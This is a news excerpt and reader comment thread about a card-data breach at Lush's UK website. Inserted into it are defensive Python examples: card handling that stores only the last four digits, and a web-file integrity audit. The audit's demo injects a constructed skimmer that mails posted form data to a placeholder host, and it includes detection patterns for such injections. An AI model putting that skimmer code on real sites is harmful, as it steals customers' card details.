Luxury cosmetics firm Lush has ditched its UK website in response to a sustained hacking attack which left users vulnerable to credit card fraud. The firm warns that credit card details submitted to the Lush.co.uk site between 4 October and 20 January may have been compromised by the assault by unknown hackers. Customers are …
I can just imagine the development log:
Version 1.1.23 Hacked
Version 1.1.24 Added one line fix to close security hole.
Version 1.1.25 Changes CSS skinning slightly so site looks subtly different
Version 2.0.0 UpperManagement decided old site must be 'retired' so upped version number to 2.0.0 and have told upper management that it is a new website (pointed at the slightly different colours and page layout when they questioned this)
an uneducated guess
Once the website went live, they "retired" the person who developed it (or their mum won't let them do any more freelancing until the school holidays). Now that they need to get their security sorted out, that person, or the Post-It they wrote the documentation on, is no longer available.
Why on earth...?
As someone affected by this, I want to know why my card details were being stored in cleartext, rather than being encrypted. Having an SSL link to pass my details when shopping is bugger all use if they're going to held in-the-clear on a server at the other end. Not even a basic hash...?
I wouldn't worry about the hashing
They're probably printed out on a nightly report that either gets left on a desk for the cleaners or chucked in the normal waste.
Clear or not...
They may not have been stored in the clear, but there would need to be a system to decrypt them, maybe this was hacked too?
Credit Card Details
I hope their expanded explanation will cover their reasoning for storing unencrypted card details.
a complete rewrite?
It's the only way, all that shiny new code will be free of bugs and vulnerabilities, new code always is.
It also implies that as they are pulling the whole lot and not just taking it down to fix it then the site was awful to start with.
So, who signed off the original?
Who didn't test it? (are there not tools for this?)
we take off and nuke the site from orbit.
it's the only way.
I like their bath bombs - terrific stuff! But their on-line customer safety strategy stinks!
Having had to work through this forwards and backwards across all our operating companies' setups, I can't see how on earth this is even possible. Which means Lush's payment handler will make them foot the bill for any breaches.
Unencrypted card details?
I hope someone is recreationally fired for that mistake.
I *think* if the card issuers find the data has not been held securely they can not only force Lush to cover the losses, but they can refuse to offer card services to the company.
No card services
that is probably the reason the article states that the new site will initially only be accepting paypal as a payment option.
I know that in systems I work with the card details (number, dates & cvn) are never written to the server, the only thing that gets written is the last 4 digits of the card number, the card type, the outcome of the transaction and the transaction reference number (example 3754,Visa,Success,1/35325/234)
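The record layout described in the post above, written out as an added example; this is not code from the thread, from Lush, or from any payment provider. The full PAN, expiry and CVN exist only in the incoming request: a Luhn check and a coarse brand lookup run on them, a hypothetical `authorise_with_provider` stands in for the call to a PCI-compliant gateway, and only the last four digits, brand, outcome and reference are returned for storage. A `leaks_pan` scanner is included to check records and log lines for anything that still looks like a full card number. The sample checkout submission and the provider's response are constructed values.

```python
import re
from dataclasses import dataclass

# Constructed sample checkout submission, i.e. what the browser posts.
# It is the only place the full PAN, expiry and CVN ever exist in this process.
SAMPLE_CHECKOUT = {"pan": "4111 1111 1111 1111", "expiry": "12/27", "cvn": "123"}


@dataclass(frozen=True)
class TransactionRecord:
    """The only fields that are ever written to disk or database."""
    last4: str
    brand: str
    outcome: str
    reference: str


def normalise_pan(pan: str) -> str:
    """Strip spaces and dashes; reject anything that is not 13-19 digits."""
    digits = re.sub(r"[ -]", "", pan)
    if not re.fullmatch(r"\d{13,19}", digits):
        raise ValueError("malformed card number")
    return digits


def luhn_ok(digits: str) -> bool:
    """Standard Luhn mod-10 check, walking the digits right to left."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def card_brand(digits: str) -> str:
    """Coarse brand detection from the leading digits (simplified ranges)."""
    if digits[0] == "4":
        return "Visa"
    if digits[:2] in {"51", "52", "53", "54", "55"}:
        return "Mastercard"
    if digits[:2] in {"34", "37"}:
        return "Amex"
    return "Unknown"


def authorise_with_provider(pan: str, expiry: str, cvn: str):
    """Hypothetical stand-in for the call to a PCI-compliant payment provider.
    Returns (outcome, reference); the values are constructed, not a real gateway."""
    return ("Success", "1/35325/234")


def process_checkout(form: dict) -> TransactionRecord:
    """Validate, hand the card data to the provider, keep only what is safe to store."""
    digits = normalise_pan(form["pan"])
    if not luhn_ok(digits):
        raise ValueError("card number fails Luhn check")
    outcome, reference = authorise_with_provider(digits, form["expiry"], form["cvn"])
    # Only the truncated PAN and the non-sensitive outcome survive this function.
    return TransactionRecord(digits[-4:], card_brand(digits), outcome, reference)


# 13-19 digits, optionally separated by spaces or dashes.
PAN_RE = re.compile(r"\d(?:[ -]?\d){12,18}")


def leaks_pan(text: str) -> bool:
    """Guard for logs and records: any Luhn-valid 13-19 digit run counts as a leaked PAN."""
    return any(luhn_ok(re.sub(r"[ -]", "", m.group())) for m in PAN_RE.finditer(text))


if __name__ == "__main__":
    record = process_checkout(SAMPLE_CHECKOUT)
    print(record)                      # last4='1111', brand='Visa', ...
    print(leaks_pan(repr(record)))     # False: nothing card-like was kept
```

The point of `leaks_pan` is that "we don't store card numbers" is only true if nothing else on the box does either; running it over debug output and exception traces is a cheap way to catch the full PAN ending up in a log file.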
Tat seller = Good back office? Not!
What incentive would a vendor of over-perfumed tat (what the fuck do we need bath bombs for?) have to prudently look after other people's credit card details?
wtf do we need bath bombs for
"what the fuck do we need bath bombs for"
Um, excuse me but they actually make for great bath plug-hole blockers!
Got the email this morning, I like the way they came clean...(no pun intended) their original site sucked and the payment side hardly worked at all, seemed to be based on Joomla and virtuemart, put together by a college kid.
Anyway, took the chance (wife, xmas etc) and got stung by it.. loads of xbox live payments, online gambling and a personal dating site which just about sums up the pricks that did the hack. Few other transactions which appeared to be from around the Poole area so this would link up with where Lush are based, maybe an inside job???
Banks typically don't give a shit, but from the transactions it doesn't look particularly difficult to track these twats down if they pulled their finger out.
Someone used my credit card details to buy a Sports Illustrated magazine subscription. I used the reference details on my credit card bill to log in to the guy's account on the Sports Illustrated website and get the subscription delivery address in Colorado - presumably the perp's home address. I live in the UK but I had used the card in a nearby Gap store in Colorado shortly before.
So I called the bank again to give them the address, but their response was total disinterest. I think they're only interested if there's a bonus in it for them.
Denver PD would presumably be rather interested
They even have the phone number on the website
A nice simple collar for them, helps up the crime solving stats, could uncover something better.
They might even send you some free doughnuts as a thank you
Having also been through PCI, with several providers and setups I also cannot see how this is possible. Surely the most basic vulnerability tests would have picked this up?
When filling out the SAQ, did they just skip past the bit about the security or encryption around their database? Did they even declare that they store these details? That should have unleashed a world of hurt with their PCI.
I for one will always go down the route of never touching, seeing or being anywhere near a customers card details. Hire a PCI compliant payment provider, and just have them tell you when the money has been taken.
Not sure what Tier Lush are but may not be able to self-assess.
Alanis Morissette would be proud
Old website removed because of concerns over fraudulent financial activity, new website replaces this with PayPal.
Paris, because she's also prone to having her holes exposed online.
Someone in government or the civil service does this and the public and media are baying for blood / sacking / hanging.
But a private company does and it barely gets a mention, other than in the tech journals.
That's because ...
When someone in government or the civil service does this and the public and media are baying for blood / sacking / hanging, nothing happens.
When a private company does it, someone gets sacked.
Lush - Luxury?
Have you seen their products?
What do you expect, IIS?!
Oh dear.... Netcraft 'what's this site running' information: (no wonder they are retiring it)
Redstation Internet Ltd Internet Web Hosting 184.108.40.206 Windows 2000 Microsoft-IIS/5.0 5-Jun-2007
and it looks like their splash page has just been changed to
Linux Apache 21-Jan-2011 220.127.116.11 United Hosting IPv4 Assignment
That totally explains the trapster hack too!
Linux Apache/2.2.3 (CentOS) 21-Jan-2011 18.104.22.168 Trapster.com
Devil is in the details
Do we know when it occurred or how? You cannot blame Linux for that unless you have data for it. I cannot say MS IIS is at fault for lush as well, since details are missing. Still it is interesting if they switched to Linux recently.
That was my point, really, although my post ended up sounding like I was participating in a fanboy war. I would be willing to bet in both cases that the hack was not due to a flaw in the underlying stack, but some foolishness at the application level.
...nuke the entire site from orbit. It's the only way to be sure.
Sucks to have your website hacked. Sounds like failure to filter input but all over the site and hacks on top of hacks. If they customised Joomla then keeping it up to date will be tricky at best. Clearly they looked at the code and decided it was better to start again.
It's why I use my own code site-wide. A faff, but I know the site inside-out. And I enjoy the programming. The small pleasures of watching fruitless probes for a non-existent CMS make it all worthwhile...
"The small pleasures of watching fruitless probes for a non-existent CMS make it all worthwhile..."
I concur. I see it all the time.
Storing credit card details
Why did they even need to store the full card details? Once the payment has been authorised just keep the (encrypted) card number (in case of a charge-back) and delete the expiry date and security digits. The card number alone would be worthless to the hackers.
storing credit cards online
Why in this day and age are they still storing credit cards online and in the clear? What have all the innovators been doing this past decade?
Am I being thick?
I've not seen anything which says the attackers picked up passwords from a file or from the database in plain text. This attack would be easily achievable using XSS or simple insertion of code into the PHP on the server at the point the browser commits them. Said code could email to a drop box account or access a remote server to upload the card details.
Without auditing of all live files against the database, an html file could have had a remote scripting attack in it for months without being detected, especially if the site design wasn't changed.
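One way to do the audit of live files that the post above calls for, added here as an illustration; it is not code from the thread or from Lush. It hashes every file under the web root into a manifest, diffs a later manifest against that baseline, and scans the changed files for a few patterns typical of the injected code the post describes (an off-site script include, eval of a base64 payload, posted form data handed to mail()). The sample site files, the injected lines and the pattern list are all constructed assumptions; a real deployment would keep the baseline manifest somewhere the web server account cannot write.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Patterns a reviewer would want flagged in files that should contain only
# first-party markup and code. Assumed heuristics, not an exhaustive list.
SUSPICIOUS = [
    (re.compile(r"<script[^>]+src=[\"']https?://", re.I), "off-site script include"),
    (re.compile(r"eval\s*\(\s*base64_decode", re.I), "eval of base64 payload"),
    (re.compile(r"mail\s*\([^)]*\$_POST", re.I | re.S), "POST data mailed out"),
]


def build_manifest(root: Path) -> dict:
    """Map each file (relative to root) to the SHA-256 of its contents."""
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[str(path.relative_to(root))] = digest
    return manifest


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Report files that appeared, vanished or changed since the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def suspicious_findings(root: Path, rel_paths) -> list:
    """Scan the given files and return (path, line number, reason) for each hit."""
    findings = []
    for rel in rel_paths:
        text = (root / rel).read_text(errors="replace")
        for pattern, why in SUSPICIOUS:
            for m in pattern.finditer(text):
                line_no = text.count("\n", 0, m.start()) + 1
                findings.append((rel, line_no, why))
    return findings


def demo() -> dict:
    """Constructed scenario: baseline a two-file site, inject a skimmer, re-audit."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "checkout.php").write_text("<form method=post>...</form>\n")
        (root / "index.html").write_text("<h1>Welcome</h1>\n")
        baseline = build_manifest(root)

        # Constructed attacker edit: an off-site include plus a mail-out of the
        # posted card fields, appended to the checkout page.
        with (root / "checkout.php").open("a") as f:
            f.write('<script src="https://static.example.invalid/k.js"></script>\n')
            f.write("<?php mail('drop@example.invalid', 'c', json_encode($_POST)); ?>\n")

        changes = diff_manifest(baseline, build_manifest(root))
        findings = suspicious_findings(root, changes["modified"] + changes["added"])
        return {"changes": changes, "findings": findings}


if __name__ == "__main__":
    result = demo()
    print(result["changes"])   # modified: ['checkout.php']
    for rel, line_no, why in result["findings"]:
        print(f"{rel}:{line_no}: {why}")
```

The hash diff is what catches the edit regardless of what was injected; the pattern scan only exists to tell the operator which of the changed files to look at first. A checkout page that has been stable for months and suddenly shows as modified is the signal the post is describing.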
Storing credit cards
I worked, albeit for 3 months, for a large company who did payment processing. Credit cards were stored in a SQL database in cleartext along with the name and address of the customer. This SQL database was visible on the internet and was about 8 characters away from being hacked (given that the sa account could be used). I think the only reason they got away with it is because nobody has ever heard of them (they only handle the payments) and thus didn't attack them. I left when I realised I was the only developer who seemed to think there was anything wrong with much of what they did.
If you follow where the money goes, then an attack on Lush is likely to be one of the Climate Change Deniers' computerised 'complaints', much like the so-called 'leak' of the University of East Anglia emails. Corporate malfeasance is often the simplest explanation.
Within hours of using my boss's Mastercard to buy a network switch on-line at bargain basement prices, it ended up being used to attempt to buy high-end cosmetics at a bricks & mortar 2,800 km. from here. No, the boss had never been there. No, he doesn't have a mistress there. So the guys who cracked the high-end cosmetics boutique may have been simply trying to avenge us! The Fountain Valley, CA beauty shop had the decency to call and check since the bill-to / ship-to were so much at odds.
I guess we humans are good for something after all....
Paris, just cuz.
This company isn't in the US so I can't be too harsh but I can say it's good to see we still have companies out there that have no idea how to manage their security yet they are accepting credit cards through the internet.
Credit cards truly were a good idea. The card companies make a gazillion dollars while basically sharing no liability. The merchants in general are sacked with the expenses of keeping in 'compliance' yet things like this still seem to happen.
What a joke..
"24 hour security monitoring has shown us that we are still being targeted and there are continuing attempts to re-enter." OBVIOUSLY, why wouldn't you expect this? Any front-end website on the internet will face constant attacks. I bet they came to this conclusion after checking attempted ssh logins, genius!
"We Believe hacking is a serious crime which steals large amounts of money and disrupts the lives of cardholders." No.. really?
"We Believe that hacking erodes the trust between businesses and their customers and creates a climate of fear around online ordering." No, just no. Not investing the correct amount of resources in your online business will erode the trust between yourself and your users.
The climate of fear that they talk about has come around because of businesses like themselves, business that just don't take these kind of issues seriously. Like investing in a decent web company.
I hope they get sued for this massive breach of user data.